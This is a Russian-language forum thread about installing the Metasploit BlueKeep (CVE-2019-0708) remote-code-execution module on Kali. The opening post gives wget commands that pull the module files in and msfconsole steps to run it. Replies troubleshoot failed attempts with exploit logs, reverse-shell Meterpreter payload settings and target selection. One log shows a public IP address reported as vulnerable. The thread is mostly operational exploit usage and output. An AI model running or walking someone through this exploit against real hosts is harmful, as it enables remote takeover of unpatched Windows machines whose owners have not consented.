Soft Metasploit Эксплоит BlueKeep (CVE-2019-0708)

Вышел публичный эксплоит на уязвимость BlueKeep (CVE-2019-0708). Теперь он есть в составе Metasploit Framework, но пока еще не появился в deb пакетах.

Ссылка скрыта от гостей

Выпущенный эксплоит работает на следующих ОС и конфигурациях:
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

Для тех, кто хочет проверить СВОИ сервера на возможность практической реализации уязвимости, данный эксплоит его можно поставить вручную, для этого нужно с гитхаба скопировать ряд файлов и установить их в Metasploit.
Ниже привожу набор команд для установки эксплоита (пути указаны для стандартной установки Metasploit в Kali Linux):

cd ~
mkdir backup
mkdir msf
mv /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ~/backup/msf
mv /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb ~/backup/msf
mv /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb ~/backup/msf

wget -O /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget -O /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

wget -O /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

mkdir /usr/share/metasploit-framework/modules/exploits/windows/rdp
wget -O /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Далее стандартный запуск:

msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 127.0.0.1
run

И если потребуется вернуть все на место:

mv ~/backup/msf/rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
mv ~/backup/msf/cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
mv ~/backup/msf/rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
rm -rf /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
rm -rf ~/backup/

Удачных тестирований на проникновение!

 

[nullcult]

Am getting an error when i run the payload.

[-] 10.0.0.12:3389 - Exploit failed: NameError undefined local variable or method `rdp_disconnect' for #<Msf::Modules::Auxiliary__Scanner__Rdp__Cve_2019_0708_bluekeep::MetasploitModule:0x00007f982a617370> Did you mean? disconnect [/ ICODE]

 

[FantomDragon]

Такой вопрос а если я ставил меиасплойто через unstable-repo
Команди не роботают

 

[Black Diver]

Am getting an error when i run the payload.

[-] 10.0.0.12:3389 - Exploit failed: NameError undefined local variable or method `rdp_disconnect' for #<Msf::Modules::Auxiliary__Scanner__Rdp__Cve_2019_0708_bluekeep::MetasploitModule:0x00007f982a617370> Did you mean? disconnect [/ ICODE]

На заменился файл /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb (он у вас может лежать по другому адресу например)
Метод rdp_disconnect находится в нем

Такой вопрос а если я ставил меиасплойто через unstable-repo
Команди не роботают

Проверьте пути установки. В /usr/share установка производится в Kali из Deb пакетов. Насколько я помню unstable ставится в /opt.

 

[FantomDragon]

На заменился файл /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb (он у вас может лежать по другому адресу например)
Метод rdp_disconnect находится в нем

Но у меня например не metasploit-framework а просто metasploit и то папка пустая

 

[Black Diver]

Но у меня например не metasploit-framework а просто metasploit и то папка пустая

Значит метасплоит установлен в другом каталоге. Где именно - зависит от системы. Может быть в /opt

 

[resharp]

[*] Started reverse TCP handler on  @@@:4444
[*] @@@:3389    - Detected RDP on @@@:3389    (Windows version: 6.1.7600) (Requires NLA: No)
[+] @@@:3389    - The target is vulnerable.
[*] @@@:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[*] @@@:3389 - Surfing channels ...
[*] @@@:3389 - Lobbing eggs ...
[-] @@@:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.

Данной проблемы ни у кого не возникло?

 

[IDDQD]

так же

[*] Started reverse TCP handler on ***:4444
[*] 202.129.209.51:3389 - Detected RDP on ***:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 202.129.209.51:3389 - The target is vulnerable.
[*] 202.129.209.51:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[*] 202.129.209.51:3389 - Surfing channels ...
[*] 202.129.209.51:3389 - Lobbing eggs ...
[-] 202.129.209.51:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.

 

[Black Diver]

так же

[*] Started reverse TCP handler on ***:4444
[*] 202.129.209.51:3389 - Detected RDP on ***:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 202.129.209.51:3389 - The target is vulnerable.
[*] 202.129.209.51:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[*] 202.129.209.51:3389 - Surfing channels ...
[*] 202.129.209.51:3389 - Lobbing eggs ...
[-] 202.129.209.51:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.

Похоже на то, что цель падает в BSOD. Target выбран правильно (с учётом виртуализации)?
Команды:
show target
set target

 

[resharp]

targets выставлен верно

 

[IDDQD]

Записал вот видео, что не так делаю?

set PAYLOAD что сюда писать ?

 

[FantomDragon]

Нужно payload в месте с єтим експлойтом использовать

 

[IDDQD]

Нужно payload в месте с єтим експлойтом использовать

set PAYLOAD windows/x64/meterpreter/reverse_tcp ? (так пробовал, тоже самое)

 

[nullcult]

[*] Started reverse TCP handler on  @@@:4444
[*] @@@:3389    - Detected RDP on @@@:3389    (Windows version: 6.1.7600) (Requires NLA: No)
[+] @@@:3389    - The target is vulnerable.
[*] @@@:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[*] @@@:3389 - Surfing channels ...
[*] @@@:3389 - Lobbing eggs ...
[-] @@@:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.

Has anyone had this problem?

It might be the AV. try using reverse_tcp_rc4 payload

 

[nullcult]

[*] Started reverse TCP handler on 80.255.3.94:7443
[*] 10.0.0.12:3389        - Detected RDP on 10.0.0.12:3389        (Windows version: 6.0.6001) (Requires NLA: No)
[+] 10.0.0.12:3389        - The target is vulnerable.
[*] 10.0.0.12:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 10.0.0.12:3389 - Surfing channels ...
[*] 10.0.0.12:3389 - Lobbing eggs ...
[-] 10.0.0.12:3389 - Exploit failed: OpenSSL::SSL::SSLError SSL_write: protocol is shutdown
[*] Exploit completed, but no session was created.

Has anyone encountered this?

 

[White_HacK]

[*] Started reverse TCP handler on  @@@:4444
[*] @@@:3389    - Detected RDP on @@@:3389    (Windows version: 6.1.7600) (Requires NLA: No)
[+] @@@:3389    - The target is vulnerable.
[*] @@@:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[*] @@@:3389 - Surfing channels ...
[*] @@@:3389 - Lobbing eggs ...
[-] @@@:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.

Данной проблемы ни у кого не возникло?

попробуйте так:

set target 2

 

[WhiteHacK]

Данной проблемы ни у кого не возникло?

скорее всего это связано с неправильным адресом, в Вашем случае адрес "0xfffffa8011e07000" возможно вызывает ошибку, не все так просто с этой уязвимостью как может показаться на первый взгляд, данную проблему уже во всю обсуждают на github'e в теме bluekeep

PS: если кто то найдет решение данной проблемы под Windows 7 x64 (не на виртуальной машине!!!), буду очень признателен.

 

[Demi]

Внимательно читайте таргеты, с этой уязвимостью не все так просто
данный екслойт под определенную версию винды

Exploit targets:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting
   1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
   2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
   3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
   4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

 

[WhiteHacK]

данный екслойт под определенную версию винды

Совершенно верно, вот только с Windows 7 SP1 x64 данной версии на реальном железе все ровно возникают проблемы, на github'е обсуждают вариант автоматизации поиска нужного смещения, но пока с рабочим решением глухо.

В то же время такая же версия Windows 7 на виртуалке пробивается без проблем.

 

[Adren]

Для понимания нюансов почитайте тут:

Ссылка скрыта от гостей